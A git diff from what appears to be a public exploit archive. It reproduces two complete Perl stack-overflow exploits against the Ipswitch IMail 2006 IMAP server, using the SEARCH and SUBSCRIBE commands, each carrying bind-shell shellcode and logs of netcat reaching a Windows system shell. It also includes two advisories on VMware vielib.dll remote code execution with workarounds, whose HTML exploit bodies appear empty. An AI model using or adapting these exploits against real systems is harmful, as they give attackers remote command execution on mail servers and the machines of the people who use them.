00418D12 |. 83C4 08 |ADD ESP,8 -# -# The programmer has made an extreamly stupid mistake. -# He checks the arg's first byte, if it is 0x22( " ),then invoke strcpy, -# else strncpy. -# the buffer overflow takes place when the strcpy is called. -# But the strncpy is also vulnerable,because it just likes this: strncpy(dest, src, strlen(src)); -# So, whether the command was started with a '"' or not, the stack overflow will take place immediately. 
-# -# Multiple SEARCH COMMAND is vulnerable,in this case, we use "SEARCH ON". -# But others like "SEARCH BEFORE" command will also trigger the overflow. -# -# NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!! -# -# Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20 -# -# Tested On Windows 2003 SP1 CN -# -# D:\>perl imap.pl 192.168.226.128 143 -# * OK IMAP4 Server (IMail 9.10) -# 0 OK LOGIN completed -# * FLAGS (\Answered \Flagged \Deleted \Seen \Draft) -# * 1 EXISTS -# * 1 RECENT -# * OK [UIDVALIDITY 1185337300] UIDs valid -# * OK [UIDNEXT 485337302] Predicted next UID -# 2 OK [READ-WRITE] SELECT completed -# -------------- [BEGIN] ------------------- -# ---------------- [END] ------------------ -# -# -# D:\>nc -vv -n 192.168.226.128 1154 -# (UNKNOWN) [192.168.226.128] 1154 (?) open -# Microsoft Windows [°æ±¾ 5.2.3790] -# (C) °æÈ¨ËùÓÐ 1985-2003 Microsoft Corp. -# -# C:\WINDOWS\system32> -# -# - - -use strict; -use warnings; -use IO::Socket; - -#Target IP -my $host = shift ; -my $port = shift ; -my $account = "void"; -my $password = "ph4nt0m.org"; - -my $pad1 = "void[at]ph4nt0m.org_" x 4 . "ph4nt0m"; -my $pad2 = 'void[at]pstgroup'; -my $jmpesp = "\x12\x45\xfa\x7f"; # Windows 2000/xp/2003 Universal - -# win32_bind - EXITFUNC=thread LPORT=1154 Size=344 Encoder=Pex http://metasploit.com -my $shellcode = -"\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xb6". -"\x78\xf8\x75\x83\xee\xfc\xe2\xf4\x4a\x12\x13\x38\x5e\x81\x07\x8a". -"\x49\x18\x73\x19\x92\x5c\x73\x30\x8a\xf3\x84\x70\xce\x79\x17\xfe". -"\xf9\x60\x73\x2a\x96\x79\x13\x3c\x3d\x4c\x73\x74\x58\x49\x38\xec". -"\x1a\xfc\x38\x01\xb1\xb9\x32\x78\xb7\xba\x13\x81\x8d\x2c\xdc\x5d". -"\xc3\x9d\x73\x2a\x92\x79\x13\x13\x3d\x74\xb3\xfe\xe9\x64\xf9\x9e". -"\xb5\x54\x73\xfc\xda\x5c\xe4\x14\x75\x49\x23\x11\x3d\x3b\xc8\xfe". -"\xf6\x74\x73\x05\xaa\xd5\x73\x35\xbe\x26\x90\xfb\xf8\x76\x14\x25". -"\x49\xae\x9e\x26\xd0\x10\xcb\x47\xde\x0f\x8b\x47\xe9\x2c\x07\xa5". 
-"\xde\xb3\x15\x89\x8d\x28\x07\xa3\xe9\xf1\x1d\x13\x37\x95\xf0\x77". -"\xe3\x12\xfa\x8a\x66\x10\x21\x7c\x43\xd5\xaf\x8a\x60\x2b\xab\x26". -"\xe5\x2b\xbb\x26\xf5\x2b\x07\xa5\xd0\x10\xfc\xf7\xd0\x2b\x71\x94". -"\x23\x10\x5c\x6f\xc6\xbf\xaf\x8a\x60\x12\xe8\x24\xe3\x87\x28\x1d". -"\x12\xd5\xd6\x9c\xe1\x87\x2e\x26\xe3\x87\x28\x1d\x53\x31\x7e\x3c". -"\xe1\x87\x2e\x25\xe2\x2c\xad\x8a\x66\xeb\x90\x92\xcf\xbe\x81\x22". -"\x49\xae\xad\x8a\x66\x1e\x92\x11\xd0\x10\x9b\x18\x3f\x9d\x92\x25". -"\xef\x51\x34\xfc\x51\x12\xbc\xfc\x54\x49\x38\x86\x1c\x86\xba\x58". -"\x48\x3a\xd4\xe6\x3b\x02\xc0\xde\x1d\xd3\x90\x07\x48\xcb\xee\x8a". -"\xc3\x3c\x07\xa3\xed\x2f\xaa\x24\xe7\x29\x92\x74\xe7\x29\xad\x24". -"\x49\xa8\x90\xd8\x6f\x7d\x36\x26\x49\xae\x92\x8a\x49\x4f\x07\xa5". -"\x3d\x2f\x04\xf6\x72\x1c\x07\xa3\xe4\x87\x28\x1d\x59\xb6\x18\x15". -"\xe5\x87\x2e\x8a\x66\x78\xf8\x75"; - - -my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>$port, proto=>"tcp" ) || die "Connect error.\n"; - -my $res = <$sock>; -print $res; -if( $res !~ /OK/ ) -{ - exit(-1); -} - -# login -print $sock "0 LOGIN $account $password\r\n"; -print $res = <$sock>; -if( $res !~ /0 OK/ ) -{ - exit(-1); -} - -# select -print $sock "1 SELECT INBOX\r\n"; -while(1) -{ - print $res = <$sock>; - if($res =~ /1 OK/) - { last; } - elsif($res =~ /1 NO/ || $res =~ /BAD/) - { exit(-1); } - else - { next; } -} - -# search -my $payload = $pad1.$jmpesp.$pad2.$shellcode; -print $sock "2 SEARCH ON <$payload>\r\n"; - -$sock->close(); - -# milw0rm.com [2007-07-25] +#!/use/bin/perl +# +# Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit +# Author: ZhenHan.Liu#ph4nt0m.org +# Date: 2007-07-25 +# Team: Ph4nt0m Security Team (http://www.ph4nt0m.org) +# +# Vuln Found by: Manuel Santamarina Suarez +# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=563 +# +# The Vuln code is here (imap4d32.exe version 6.8.8.1) +# 00418CCA |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8] +# 00418CD0 |. 
0FBE11 |MOVSX EDX,BYTE PTR DS:[ECX] +# 00418CD3 |. 83FA 22 |CMP EDX,22 +# 00418CD6 |. 75 2A |JNZ SHORT IMAP4D32.00418D02 +# 00418CD8 |. 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8] +# 00418CDE |. 50 |PUSH EAX ; /String +# 00418CDF |. FF15 84004300 |CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>>; \lstrlenA +# 00418CE5 |. 83E8 02 |SUB EAX,2 +# 00418CE8 |. 50 |PUSH EAX ; /maxlen +# 00418CE9 |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8] ; | +# 00418CEF |. 83C1 01 |ADD ECX,1 ; | +# 00418CF2 |. 51 |PUSH ECX ; |src +# 00418CF3 |. 8D55 AC |LEA EDX,DWORD PTR SS:[EBP-54] ; | +# 00418CF6 |. 52 |PUSH EDX ; |dest +# 00418CF7 |. FF15 00024300 |CALL DWORD PTR DS:[<&MSVCR71.strncpy>] ; \strncpy +# 00418CFD |. 83C4 0C |ADD ESP,0C +# 00418D00 |. EB 13 |JMP SHORT IMAP4D32.00418D15 +# 00418D02 |> 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8] +# 00418D08 |. 50 |PUSH EAX ; /src +# 00418D09 |. 8D4D AC |LEA ECX,DWORD PTR SS:[EBP-54] ; | +# 00418D0C |. 51 |PUSH ECX ; |dest +# 00418D0D |. E8 7E610100 |CALL ; \strcpy +# 00418D12 |. 83C4 08 |ADD ESP,8 +# +# The programmer has made an extreamly stupid mistake. +# He checks the arg's first byte, if it is 0x22( " ),then invoke strcpy, +# else strncpy. +# the buffer overflow takes place when the strcpy is called. +# But the strncpy is also vulnerable,because it just likes this: strncpy(dest, src, strlen(src)); +# So, whether the command was started with a '"' or not, the stack overflow will take place immediately. +# +# Multiple SEARCH COMMAND is vulnerable,in this case, we use "SEARCH ON". +# But others like "SEARCH BEFORE" command will also trigger the overflow. +# +# NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!! 
+# +# Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20 +# +# Tested On Windows 2003 SP1 CN +# +# D:\>perl imap.pl 192.168.226.128 143 +# * OK IMAP4 Server (IMail 9.10) +# 0 OK LOGIN completed +# * FLAGS (\Answered \Flagged \Deleted \Seen \Draft) +# * 1 EXISTS +# * 1 RECENT +# * OK [UIDVALIDITY 1185337300] UIDs valid +# * OK [UIDNEXT 485337302] Predicted next UID +# 2 OK [READ-WRITE] SELECT completed +# -------------- [BEGIN] ------------------- +# ---------------- [END] ------------------ +# +# +# D:\>nc -vv -n 192.168.226.128 1154 +# (UNKNOWN) [192.168.226.128] 1154 (?) open +# Microsoft Windows [°æ±¾ 5.2.3790] +# (C) °æÈ¨ËùÓÐ 1985-2003 Microsoft Corp. +# +# C:\WINDOWS\system32> +# +# + + +use strict; +use warnings; +use IO::Socket; + +#Target IP +my $host = shift ; +my $port = shift ; +my $account = "void"; +my $password = "ph4nt0m.org"; + +my $pad1 = "void[at]ph4nt0m.org_" x 4 . "ph4nt0m"; +my $pad2 = 'void[at]pstgroup'; +my $jmpesp = "\x12\x45\xfa\x7f"; # Windows 2000/xp/2003 Universal + +# win32_bind - EXITFUNC=thread LPORT=1154 Size=344 Encoder=Pex http://metasploit.com +my $shellcode = +"\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xb6". +"\x78\xf8\x75\x83\xee\xfc\xe2\xf4\x4a\x12\x13\x38\x5e\x81\x07\x8a". +"\x49\x18\x73\x19\x92\x5c\x73\x30\x8a\xf3\x84\x70\xce\x79\x17\xfe". +"\xf9\x60\x73\x2a\x96\x79\x13\x3c\x3d\x4c\x73\x74\x58\x49\x38\xec". +"\x1a\xfc\x38\x01\xb1\xb9\x32\x78\xb7\xba\x13\x81\x8d\x2c\xdc\x5d". +"\xc3\x9d\x73\x2a\x92\x79\x13\x13\x3d\x74\xb3\xfe\xe9\x64\xf9\x9e". +"\xb5\x54\x73\xfc\xda\x5c\xe4\x14\x75\x49\x23\x11\x3d\x3b\xc8\xfe". +"\xf6\x74\x73\x05\xaa\xd5\x73\x35\xbe\x26\x90\xfb\xf8\x76\x14\x25". +"\x49\xae\x9e\x26\xd0\x10\xcb\x47\xde\x0f\x8b\x47\xe9\x2c\x07\xa5". +"\xde\xb3\x15\x89\x8d\x28\x07\xa3\xe9\xf1\x1d\x13\x37\x95\xf0\x77". +"\xe3\x12\xfa\x8a\x66\x10\x21\x7c\x43\xd5\xaf\x8a\x60\x2b\xab\x26". +"\xe5\x2b\xbb\x26\xf5\x2b\x07\xa5\xd0\x10\xfc\xf7\xd0\x2b\x71\x94". 
+"\x23\x10\x5c\x6f\xc6\xbf\xaf\x8a\x60\x12\xe8\x24\xe3\x87\x28\x1d". +"\x12\xd5\xd6\x9c\xe1\x87\x2e\x26\xe3\x87\x28\x1d\x53\x31\x7e\x3c". +"\xe1\x87\x2e\x25\xe2\x2c\xad\x8a\x66\xeb\x90\x92\xcf\xbe\x81\x22". +"\x49\xae\xad\x8a\x66\x1e\x92\x11\xd0\x10\x9b\x18\x3f\x9d\x92\x25". +"\xef\x51\x34\xfc\x51\x12\xbc\xfc\x54\x49\x38\x86\x1c\x86\xba\x58". +"\x48\x3a\xd4\xe6\x3b\x02\xc0\xde\x1d\xd3\x90\x07\x48\xcb\xee\x8a". +"\xc3\x3c\x07\xa3\xed\x2f\xaa\x24\xe7\x29\x92\x74\xe7\x29\xad\x24". +"\x49\xa8\x90\xd8\x6f\x7d\x36\x26\x49\xae\x92\x8a\x49\x4f\x07\xa5". +"\x3d\x2f\x04\xf6\x72\x1c\x07\xa3\xe4\x87\x28\x1d\x59\xb6\x18\x15". +"\xe5\x87\x2e\x8a\x66\x78\xf8\x75"; + + +my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>$port, proto=>"tcp" ) || die "Connect error.\n"; + +my $res = <$sock>; +print $res; +if( $res !~ /OK/ ) +{ + exit(-1); +} + +# login +print $sock "0 LOGIN $account $password\r\n"; +print $res = <$sock>; +if( $res !~ /0 OK/ ) +{ + exit(-1); +} + +# select +print $sock "1 SELECT INBOX\r\n"; +while(1) +{ + print $res = <$sock>; + if($res =~ /1 OK/) + { last; } + elsif($res =~ /1 NO/ || $res =~ /BAD/) + { exit(-1); } + else + { next; } +} + +# search +my $payload = $pad1.$jmpesp.$pad2.$shellcode; +print $sock "2 SEARCH ON <$payload>\r\n"; + +$sock->close(); + +# milw0rm.com [2007-07-25] diff --git a/platforms/windows/remote/4228.pl b/platforms/windows/remote/4228.pl index d62198bd5..13fe463cd 100755 --- a/platforms/windows/remote/4228.pl +++ b/platforms/windows/remote/4228.pl 
@@ -1,147 +1,147 @@ -#!/use/bin/perl - -# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1 -# Code by yunshu, our team: www.ph4nt0m.org Mail list: http://list.ph4nt0m.org - -#F:\>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass -#* OK IMAP4 Server (IMail 9.10) -#0 OK LOGIN completed -#* FLAGS (\Answered \Flagged \Deleted \Seen \Draft) -#* 0 EXISTS -#* 0 RECENT -#* OK [UIDVALIDITY 1185270594] UIDs valid -#* OK [UIDNEXT 485270595] Predicted next UID -#2 OK [READ-WRITE] SELECT completed -#3 OK SUBSCRIBE completed -#Trying.. -#Bingle!Maybe get it! -#You can try to telnet 22 port, do you have nc? - - -#D:\Microsoft Visual Studio 8\VC>nc -vv 192.168.1.2 22 -#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA -#(UNKNOWN) [192.168.1.2] 22 (?) open -#Microsoft Windows [.. 5.2.3790] -#(C) .... 1985-2003 Microsoft Corp. - -#C:\WINDOWS\system32>net user -#net user - -#\\ ..... - -#------------------------------------------------------------------------------- -#Administrator ASPNET Guest -#IUSR_WIN2K3 IWAM_WIN2K3 SUPPORT_388945a0 -#.................. - - -#C:\WINDOWS\system32> - - -use strict; -use warnings; -use IO::Socket; - -if( @ARGV != 3 ) -{ - my $banner = qq{ -Imail subscribe exploit, Test on Imail 2006(9.10),windows 2003 Chinese SP1 -You must have a account to login the imap server, good luck! -Code by yunshu, our team www.ph4nt0m.org, enjoin this exp~~ - -imail_subscribe.pl -}; - - print $banner."\n"; - - exit( -1 ); -} - -my $host = $ARGV[0]; -my $user = $ARGV[1]; -my $pass = $ARGV[2]; - -# win32_bind - EXITFUNC=thread LPORT=22 Size=344 Encoder=Pex http://metasploit.com -my $shellcode = -"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x41". -"\xd1\xfd\xbc\x83\xeb\xfc\xe2\xf4\xbd\xbb\x16\xf1\xa9\x28\x02\x43". -"\xbe\xb1\x76\xd0\x65\xf5\x76\xf9\x7d\x5a\x81\xb9\x39\xd0\x12\x37". -"\x0e\xc9\x76\xe3\x61\xd0\x16\xf5\xca\xe5\x76\xbd\xaf\xe0\x3d\x25". 
-"\xed\x55\x3d\xc8\x46\x10\x37\xb1\x40\x13\x16\x48\x7a\x85\xd9\x94". -"\x34\x34\x76\xe3\x65\xd0\x16\xda\xca\xdd\xb6\x37\x1e\xcd\xfc\x57". -"\x42\xfd\x76\x35\x2d\xf5\xe1\xdd\x82\xe0\x26\xd8\xca\x92\xcd\x37". -"\x01\xdd\x76\xcc\x5d\x7c\x76\xfc\x49\x8f\x95\x32\x0f\xdf\x11\xec". -"\xbe\x07\x9b\xef\x27\xb9\xce\x8e\x29\xa6\x8e\x8e\x1e\x85\x02\x6c". -"\x29\x1a\x10\x40\x7a\x81\x02\x6a\x1e\x58\x18\xda\xc0\x3c\xf5\xbe". -"\x14\xbb\xff\x43\x91\xb9\x24\xb5\xb4\x7c\xaa\x43\x97\x82\xae\xef". -"\x12\x82\xbe\xef\x02\x82\x02\x6c\x27\xb9\xfd\xaa\x27\x82\x74\x5d". -"\xd4\xb9\x59\xa6\x31\x16\xaa\x43\x97\xbb\xed\xed\x14\x2e\x2d\xd4". -"\xe5\x7c\xd3\x55\x16\x2e\x2b\xef\x14\x2e\x2d\xd4\xa4\x98\x7b\xf5". -"\x16\x2e\x2b\xec\x15\x85\xa8\x43\x91\x42\x95\x5b\x38\x17\x84\xeb". -"\xbe\x07\xa8\x43\x91\xb7\x97\xd8\x27\xb9\x9e\xd1\xc8\x34\x97\xec". -"\x18\xf8\x31\x35\xa6\xbb\xb9\x35\xa3\xe0\x3d\x4f\xeb\x2f\xbf\x91". -"\xbf\x93\xd1\x2f\xcc\xab\xc5\x17\xea\x7a\x95\xce\xbf\x62\xeb\x43". -"\x34\x95\x02\x6a\x1a\x86\xaf\xed\x10\x80\x97\xbd\x10\x80\xa8\xed". -"\xbe\x01\x95\x11\x98\xd4\x33\xef\xbe\x07\x97\x43\xbe\xe6\x02\x6c". -"\xca\x86\x01\x3f\x85\xb5\x02\x6a\x13\x2e\x2d\xd4\xae\x1f\x1d\xdc". -"\x12\x2e\x2b\x43\x91\xd1\xfd\xbc"; - -my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>"143", proto=>"tcp" ) || die "Connect error.\n"; - -my $res = <$sock>; -print $res; -if( $res !~ /OK/ ) -{ - exit( -1 ); -} - -my $opcode = "\x60\x1A\x9C\x76"; -#my $opcode = "\x61\x62\x63\x64"; - -my $num = 264991; - -my $nop = "#IMAILPUB" . "\x90" x ( $num - length($shellcode) ).$shellcode."\x90\x90\xeb\x06".$opcode."\x90\x90\x90\x90"."\xE9\x44\xfd\xff\xff"."\x90" x 400; - -# login -print $sock "0 LOGIN $user $pass\r\n"; -$res = <$sock>; -if( ! 
defined($res) ) -{ - exit(-1); -} - -print $res; -if( $res !~ /OK/ ) -{ - exit(-1); -} - -print $sock "2 SELECT INBOX\r\n"; -while( <$sock> ) -{ - print $_; - if( $_ =~ /2 OK/ || $_ =~ /2 BAD/ ) - { - last; - } -} - -print $sock "3 SUBSCRIBE \"$nop\"\r\n"; -$res = <$sock>; -if( ! defined($res) ) -{ - exit(-1); -} -print $res; - -print "Trying..\n"; - -sleep( 15 ); -print "Bingle! Maybe get it!\nYou can try to telnet 22 port, do you have nc?\n"; - -print $sock "4 LOGOUT\r\n"; -print <$sock>; - -$sock->close(); - -# milw0rm.com [2007-07-26] +#!/use/bin/perl + +# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1 +# Code by yunshu, our team: www.ph4nt0m.org Mail list: http://list.ph4nt0m.org + +#F:\>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass +#* OK IMAP4 Server (IMail 9.10) +#0 OK LOGIN completed +#* FLAGS (\Answered \Flagged \Deleted \Seen \Draft) +#* 0 EXISTS +#* 0 RECENT +#* OK [UIDVALIDITY 1185270594] UIDs valid +#* OK [UIDNEXT 485270595] Predicted next UID +#2 OK [READ-WRITE] SELECT completed +#3 OK SUBSCRIBE completed +#Trying.. +#Bingle!Maybe get it! +#You can try to telnet 22 port, do you have nc? + + +#D:\Microsoft Visual Studio 8\VC>nc -vv 192.168.1.2 22 +#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA +#(UNKNOWN) [192.168.1.2] 22 (?) open +#Microsoft Windows [.. 5.2.3790] +#(C) .... 1985-2003 Microsoft Corp. + +#C:\WINDOWS\system32>net user +#net user + +#\\ ..... + +#------------------------------------------------------------------------------- +#Administrator ASPNET Guest +#IUSR_WIN2K3 IWAM_WIN2K3 SUPPORT_388945a0 +#.................. + + +#C:\WINDOWS\system32> + + +use strict; +use warnings; +use IO::Socket; + +if( @ARGV != 3 ) +{ + my $banner = qq{ +Imail subscribe exploit, Test on Imail 2006(9.10),windows 2003 Chinese SP1 +You must have a account to login the imap server, good luck! 
+Code by yunshu, our team www.ph4nt0m.org, enjoin this exp~~ + +imail_subscribe.pl +}; + + print $banner."\n"; + + exit( -1 ); +} + +my $host = $ARGV[0]; +my $user = $ARGV[1]; +my $pass = $ARGV[2]; + +# win32_bind - EXITFUNC=thread LPORT=22 Size=344 Encoder=Pex http://metasploit.com +my $shellcode = +"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x41". +"\xd1\xfd\xbc\x83\xeb\xfc\xe2\xf4\xbd\xbb\x16\xf1\xa9\x28\x02\x43". +"\xbe\xb1\x76\xd0\x65\xf5\x76\xf9\x7d\x5a\x81\xb9\x39\xd0\x12\x37". +"\x0e\xc9\x76\xe3\x61\xd0\x16\xf5\xca\xe5\x76\xbd\xaf\xe0\x3d\x25". +"\xed\x55\x3d\xc8\x46\x10\x37\xb1\x40\x13\x16\x48\x7a\x85\xd9\x94". +"\x34\x34\x76\xe3\x65\xd0\x16\xda\xca\xdd\xb6\x37\x1e\xcd\xfc\x57". +"\x42\xfd\x76\x35\x2d\xf5\xe1\xdd\x82\xe0\x26\xd8\xca\x92\xcd\x37". +"\x01\xdd\x76\xcc\x5d\x7c\x76\xfc\x49\x8f\x95\x32\x0f\xdf\x11\xec". +"\xbe\x07\x9b\xef\x27\xb9\xce\x8e\x29\xa6\x8e\x8e\x1e\x85\x02\x6c". +"\x29\x1a\x10\x40\x7a\x81\x02\x6a\x1e\x58\x18\xda\xc0\x3c\xf5\xbe". +"\x14\xbb\xff\x43\x91\xb9\x24\xb5\xb4\x7c\xaa\x43\x97\x82\xae\xef". +"\x12\x82\xbe\xef\x02\x82\x02\x6c\x27\xb9\xfd\xaa\x27\x82\x74\x5d". +"\xd4\xb9\x59\xa6\x31\x16\xaa\x43\x97\xbb\xed\xed\x14\x2e\x2d\xd4". +"\xe5\x7c\xd3\x55\x16\x2e\x2b\xef\x14\x2e\x2d\xd4\xa4\x98\x7b\xf5". +"\x16\x2e\x2b\xec\x15\x85\xa8\x43\x91\x42\x95\x5b\x38\x17\x84\xeb". +"\xbe\x07\xa8\x43\x91\xb7\x97\xd8\x27\xb9\x9e\xd1\xc8\x34\x97\xec". +"\x18\xf8\x31\x35\xa6\xbb\xb9\x35\xa3\xe0\x3d\x4f\xeb\x2f\xbf\x91". +"\xbf\x93\xd1\x2f\xcc\xab\xc5\x17\xea\x7a\x95\xce\xbf\x62\xeb\x43". +"\x34\x95\x02\x6a\x1a\x86\xaf\xed\x10\x80\x97\xbd\x10\x80\xa8\xed". +"\xbe\x01\x95\x11\x98\xd4\x33\xef\xbe\x07\x97\x43\xbe\xe6\x02\x6c". +"\xca\x86\x01\x3f\x85\xb5\x02\x6a\x13\x2e\x2d\xd4\xae\x1f\x1d\xdc". 
+"\x12\x2e\x2b\x43\x91\xd1\xfd\xbc"; + +my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>"143", proto=>"tcp" ) || die "Connect error.\n"; + +my $res = <$sock>; +print $res; +if( $res !~ /OK/ ) +{ + exit( -1 ); +} + +my $opcode = "\x60\x1A\x9C\x76"; +#my $opcode = "\x61\x62\x63\x64"; + +my $num = 264991; + +my $nop = "#IMAILPUB" . "\x90" x ( $num - length($shellcode) ).$shellcode."\x90\x90\xeb\x06".$opcode."\x90\x90\x90\x90"."\xE9\x44\xfd\xff\xff"."\x90" x 400; + +# login +print $sock "0 LOGIN $user $pass\r\n"; +$res = <$sock>; +if( ! defined($res) ) +{ + exit(-1); +} + +print $res; +if( $res !~ /OK/ ) +{ + exit(-1); +} + +print $sock "2 SELECT INBOX\r\n"; +while( <$sock> ) +{ + print $_; + if( $_ =~ /2 OK/ || $_ =~ /2 BAD/ ) + { + last; + } +} + +print $sock "3 SUBSCRIBE \"$nop\"\r\n"; +$res = <$sock>; +if( ! defined($res) ) +{ + exit(-1); +} +print $res; + +print "Trying..\n"; + +sleep( 15 ); +print "Bingle! Maybe get it!\nYou can try to telnet 22 port, do you have nc?\n"; + +print $sock "4 LOGOUT\r\n"; +print <$sock>; + +$sock->close(); + +# milw0rm.com [2007-07-26] diff --git a/platforms/windows/remote/4230.html b/platforms/windows/remote/4230.html index 55916cf7c..29dea99e9 100755 --- a/platforms/windows/remote/4230.html +++ b/platforms/windows/remote/4230.html @@ -1,17 +1,17 @@ - - - - - - - - -# milw0rm.com [2007-07-26] + + + + + + + + +# milw0rm.com [2007-07-26] diff --git a/platforms/windows/remote/4237.html b/platforms/windows/remote/4237.html index c980d38fd..258513a98 100755 --- a/platforms/windows/remote/4237.html +++ b/platforms/windows/remote/4237.html @@ -1,17 +1,17 @@ - - - - - - - - -# milw0rm.com [2007-07-27] + + + + + + + + +# milw0rm.com [2007-07-27] diff --git a/platforms/windows/remote/4240.html b/platforms/windows/remote/4240.html index bbb4723f4..bee9cfacf 100755 --- a/platforms/windows/remote/4240.html +++ b/platforms/windows/remote/4240.html 
@@ -1,84 +1,84 @@ - - - - - - - - - - - -# milw0rm.com [2007-07-28] + + + + + + + + + + + +# milw0rm.com [2007-07-28] diff --git a/platforms/windows/remote/4244.html b/platforms/windows/remote/4244.html index 61b37db4c..c648fcff6 100755 --- a/platforms/windows/remote/4244.html +++ b/platforms/windows/remote/4244.html 
@@ -1,78 +1,78 @@ -:. GOODFELLAS Security Research TEAM .: -:. http://goodfellas.shellcode.com.ar .: - -vielib.dll 2.2.5.42958 VmWare Inc version 6.0.0 Remode Code Execution Exploit -============================================================================= - -Internal ID: VULWAR200707290. ------------ - -Introduction ------------- -vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company. - - -Tested In ---------- -- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0. - - -Summary -------- -The StartProcess method doesn't check if it's being called from the application, -or malicious users. Remote Attacker could craft a html page and execute code in -a remote system with the actual user privileges. - - -Impact ------- -Any computer that uses this Sofware will be exposed to Remote Execution Code. - - -Workaround ----------- -- Activate the Kill bit zero in clsid:7B9C5422-39AA-4C21-BEEF-645E42EB4529 -- Unregister vielib.dll using regsvr32. - - -Timeline --------- -July 29 2007 -- Bug Discovery. -July 29 2007 -- Exploit published. - - -Credits -------- - * callAX - * GoodFellas Security Research Team - - -Technical Details ------------------ - -StartProcess method needs three files (stdin, stdout, stderr) to success StartProcess. The exploit -is using three standard files that exists in every Microsoft Office 2003 Application. - - - - - - - - - - -# milw0rm.com [2007-07-29] +:. GOODFELLAS Security Research TEAM .: +:. http://goodfellas.shellcode.com.ar .: + +vielib.dll 2.2.5.42958 VmWare Inc version 6.0.0 Remode Code Execution Exploit +============================================================================= + +Internal ID: VULWAR200707290. +----------- + +Introduction +------------ +vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company. + + +Tested In +--------- +- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0. 
+ + +Summary +------- +The StartProcess method doesn't check if it's being called from the application, +or malicious users. Remote Attacker could craft a html page and execute code in +a remote system with the actual user privileges. + + +Impact +------ +Any computer that uses this Sofware will be exposed to Remote Execution Code. + + +Workaround +---------- +- Activate the Kill bit zero in clsid:7B9C5422-39AA-4C21-BEEF-645E42EB4529 +- Unregister vielib.dll using regsvr32. + + +Timeline +-------- +July 29 2007 -- Bug Discovery. +July 29 2007 -- Exploit published. + + +Credits +------- + * callAX + * GoodFellas Security Research Team + + +Technical Details +----------------- + +StartProcess method needs three files (stdin, stdout, stderr) to success StartProcess. The exploit +is using three standard files that exists in every Microsoft Office 2003 Application. + + + + + + + + + + +# milw0rm.com [2007-07-29] diff --git a/platforms/windows/remote/4245.html b/platforms/windows/remote/4245.html index c7624d7b8..9f7bdbf80 100755 --- a/platforms/windows/remote/4245.html +++ b/platforms/windows/remote/4245.html 
@@ -1,74 +1,74 @@ -:. GOODFELLAS Security Research TEAM .: -:. http://goodfellas.shellcode.com.ar .: - -VmWare Inc version 6.0.0 CreateProcess & CreateProcessEx Remode Code Execution Exploit -====================================================================================== - -Internal ID: VULWAR200707300. ------------ - -Introduction ------------- -vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company. - - -Tested In ---------- -- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0. - - -Summary -------- -The CreateProcess & CreateProcessEx method doesn't check if they're being called -from the application, or malicious users. Remote Attacker could craft a html page -and execute code in a remote system with the actual user privileges. - - -Impact ------- -Any computer that uses this Sofware will be exposed to Remote Execution Code. - - -Workaround ----------- -- Activate the Kill bit zero in clsid:0F748FDE-0597-443C-8596-71854C5EA20A -- Unregister vielib.dll using regsvr32. - - -Timeline --------- -July 30 2007 -- Bug Discovery. -July 30 2007 -- Exploit published. - - -Credits -------- - * callAX - * GoodFellas Security Research Team - - -Technical Details ------------------ - - - - - - - - - - -# milw0rm.com [2007-07-30] +:. GOODFELLAS Security Research TEAM .: +:. http://goodfellas.shellcode.com.ar .: + +VmWare Inc version 6.0.0 CreateProcess & CreateProcessEx Remode Code Execution Exploit +====================================================================================== + +Internal ID: VULWAR200707300. +----------- + +Introduction +------------ +vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company. + + +Tested In +--------- +- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0. + + +Summary +------- +The CreateProcess & CreateProcessEx method doesn't check if they're being called +from the application, or malicious users. 
Remote Attacker could craft a html page +and execute code in a remote system with the actual user privileges. + + +Impact +------ +Any computer that uses this Sofware will be exposed to Remote Execution Code. + + +Workaround +---------- +- Activate the Kill bit zero in clsid:0F748FDE-0597-443C-8596-71854C5EA20A +- Unregister vielib.dll using regsvr32. + + +Timeline +-------- +July 30 2007 -- Bug Discovery. +July 30 2007 -- Exploit published. + + +Credits +------- + * callAX + * GoodFellas Security Research Team + + +Technical Details +----------------- + + + + + + + + + + +# milw0rm.com [2007-07-30] diff --git a/platforms/windows/remote/4247.c b/platforms/windows/remote/4247.c index 84bd299bb..109772ea8 100755 --- a/platforms/windows/remote/4247.c +++ b/platforms/windows/remote/4247.c 
